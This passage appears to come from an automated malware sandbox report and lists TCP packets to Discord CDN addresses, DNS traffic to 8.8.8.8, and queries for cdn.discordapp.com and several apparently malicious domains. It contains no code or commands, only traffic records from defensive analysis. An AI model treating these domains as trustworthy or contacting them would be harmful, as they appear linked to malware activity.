Nov 25, 2021 16:51:49.081995964 CET	443	49763	162.159.130.233	192.168.2.4
Nov 25, 2021 16:51:58.464437962 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.464481115 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.464631081 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.503211975 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.503248930 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.546262980 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.546405077 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.564168930 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.564201117 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.564737082 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.564894915 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.567265034 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.608880997 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.635617018 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.635750055 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.635771990 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.635808945 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.635919094 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.635919094 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.635951042 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.636126041 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.636128902 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.636161089 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.636324883 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.636338949 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.636359930 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.636490107 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.636565924 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.636637926 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.636641026 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.636646986 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.636662006 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.636759043 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.636820078 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.636837959 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.636857986 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.636893988 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.636903048 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.636909008 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.636940002 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.637037992 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.637043953 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.637063980 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.637109041 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.637125969 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.637132883 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.637156010 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.637233973 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.637243032 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.637248039 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.637269020 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.637321949 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.637337923 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.637351036 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.637411118 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.637449026 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.637466908 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.637480974 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.637530088 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.637538910 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.637554884 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.637603045 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.637624979 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.637655020 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.637676001 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.637706995 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.637727976 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.637741089 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.637758970 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.637851954 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.637851954 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.637873888 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.637926102 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.637969971 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.637991905 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.638011932 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.638051987 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.638066053 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.638073921 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.638093948 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.638189077 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.638228893 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.638252974 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.638278008 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.638319969 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.638336897 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.638354063 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.638406992 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.638420105 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.638431072 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.638452053 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.638571978 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.653990030 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.654061079 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.654134989 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.654232025 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.654237032 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.654253960 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.654330969 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.654336929 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.654340029 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.654360056 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.654427052 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.654438972 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.654448986 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.654468060 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.654541969 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.654546022 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.654547930 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.654568911 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.654637098 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.654649019 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.654681921 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.654771090 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.654831886 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.654850006 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.654865026 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.654874086 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.654957056 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.655021906 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.655035973 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.655050039 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.655057907 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.655143023 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.655206919 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.655215025 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.655221939 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.655241966 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.655322075 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.671339989 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.671444893 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.671498060 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.671524048 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.671550035 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.671550989 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.671633959 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.671652079 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.671818018 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.672538042 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.672677994 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.672719002 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.672810078 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.672811031 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.672830105 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.672944069 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.672947884 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.672969103 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.673048019 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.673052073 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.673057079 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.673075914 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.673192024 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.673196077 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.673217058 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.673295975 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.673366070 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.673383951 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.673398972 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.673458099 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.673468113 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.673495054 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.673582077 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.673590899 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.673599005 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.673625946 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.673698902 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.673711061 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.673751116 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.673852921 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.673928976 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.673954010 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.673986912 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.673994064 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.674065113 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.674078941 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.674105883 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.674199104 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.674230099 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.674251080 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.674276114 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.674285889 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.674308062 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.674339056 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.674352884 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.674375057 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.674453974 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.674458981 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.674473047 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.674535036 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.674546003 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.674609900 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.674624920 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.674638987 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.674712896 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.674745083 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.674763918 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.674793005 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.674793959 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.674876928 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.674900055 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.674916983 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.674933910 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.674945116 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.674988031 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.675007105 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.675100088 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.675162077 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.675175905 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.675189018 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.675230980 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.675540924 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.675626993 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.675656080 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.675684929 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.675707102 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.675735950 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.675785065 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.689021111 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.689068079 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.689172983 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.689198017 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.690685034 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.690695047 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.693484068 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.693577051 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.693641901 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.693665981 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.693692923 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.693763971 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.693854094 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.693895102 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.693985939 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.694003105 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.694017887 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.694081068 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.694350004 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.694386005 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.694474936 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.694490910 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.694509029 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.694619894 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.694885015 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.694924116 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.694952011 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.695065975 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.695080996 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.695386887 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.695425034 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.695478916 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.695497036 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.695511103 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.695518017 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.695564985 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.695785999 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.695822001 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.695887089 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.695903063 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.695916891 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.695964098 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.696181059 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.696218967 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.696325064 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.696341991 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.696356058 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.696630955 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.696666956 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.696680069 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.696701050 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.696722031 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.696896076 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.697047949 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.697086096 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.697169065 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.697185040 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.697199106 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.697432995 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.697469950 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.697520971 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.697536945 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.697550058 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.697556019 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.697593927 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.697810888 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.697850943 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.697918892 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.697935104 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.697947979 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.698230982 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.698270082 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.698311090 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.698329926 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.698345900 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.698355913 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.698383093 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.698551893 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.698616028 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.698689938 CET	443	49764	162.159.135.233	192.168.2.4
Nov 25, 2021 16:51:58.698689938 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.698698044 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.698827028 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:58.702084064 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:59.278791904 CET	49764	443	192.168.2.4	162.159.135.233
Nov 25, 2021 16:51:59.278835058 CET	443	49764	162.159.135.233	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 25, 2021 16:51:20.460941076 CET	55854	53	192.168.2.4	8.8.8.8
Nov 25, 2021 16:51:20.503468037 CET	53	55854	8.8.8.8	192.168.2.4
Nov 25, 2021 16:51:48.315709114 CET	63153	53	192.168.2.4	8.8.8.8
Nov 25, 2021 16:51:48.358931065 CET	53	63153	8.8.8.8	192.168.2.4
Nov 25, 2021 16:51:58.425230980 CET	52991	53	192.168.2.4	8.8.8.8
Nov 25, 2021 16:51:58.452172995 CET	53	52991	8.8.8.8	192.168.2.4
Nov 25, 2021 16:53:39.234131098 CET	61522	53	192.168.2.4	8.8.8.8
Nov 25, 2021 16:53:39.713310003 CET	53	61522	8.8.8.8	192.168.2.4
Nov 25, 2021 16:53:40.236088991 CET	61522	53	192.168.2.4	8.8.8.8
Nov 25, 2021 16:53:40.618999958 CET	53	61522	8.8.8.8	192.168.2.4
Nov 25, 2021 16:53:45.651073933 CET	52337	53	192.168.2.4	8.8.8.8
Nov 25, 2021 16:53:45.689924002 CET	53	52337	8.8.8.8	192.168.2.4
Nov 25, 2021 16:53:50.760632992 CET	55046	53	192.168.2.4	8.8.8.8
Nov 25, 2021 16:53:51.236844063 CET	53	55046	8.8.8.8	192.168.2.4
Nov 25, 2021 16:53:56.800194025 CET	49612	53	192.168.2.4	8.8.8.8
Nov 25, 2021 16:53:56.880512953 CET	53	49612	8.8.8.8	192.168.2.4

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Nov 25, 2021 16:53:40.619076967 CET	192.168.2.4	8.8.8.8	d013	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Nov 25, 2021 16:51:20.460941076 CET	192.168.2.4	8.8.8.8	0x1bcd	Standard query (0)	cdn.discordapp.com	A (IP address)	IN (0x0001)
Nov 25, 2021 16:51:48.315709114 CET	192.168.2.4	8.8.8.8	0x228	Standard query (0)	cdn.discordapp.com	A (IP address)	IN (0x0001)
Nov 25, 2021 16:51:58.425230980 CET	192.168.2.4	8.8.8.8	0xdb6b	Standard query (0)	cdn.discordapp.com	A (IP address)	IN (0x0001)
Nov 25, 2021 16:53:39.234131098 CET	192.168.2.4	8.8.8.8	0xca67	Standard query (0)	www.77777.store	A (IP address)	IN (0x0001)
Nov 25, 2021 16:53:40.236088991 CET	192.168.2.4	8.8.8.8	0xca67	Standard query (0)	www.77777.store	A (IP address)	IN (0x0001)
Nov 25, 2021 16:53:45.651073933 CET	192.168.2.4	8.8.8.8	0x6ace	Standard query (0)	www.tajniezdrzi.quest	A (IP address)	IN (0x0001)
Nov 25, 2021 16:53:50.760632992 CET	192.168.2.4	8.8.8.8	0x8b4d	Standard query (0)	www.pkem.top	A (IP address)	IN (0x0001)
Nov 25, 2021 16:53:56.800194025 CET	192.168.2.4	8.8.8.8	0xa51d	Standard query (0)	www.hagenbicycles.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
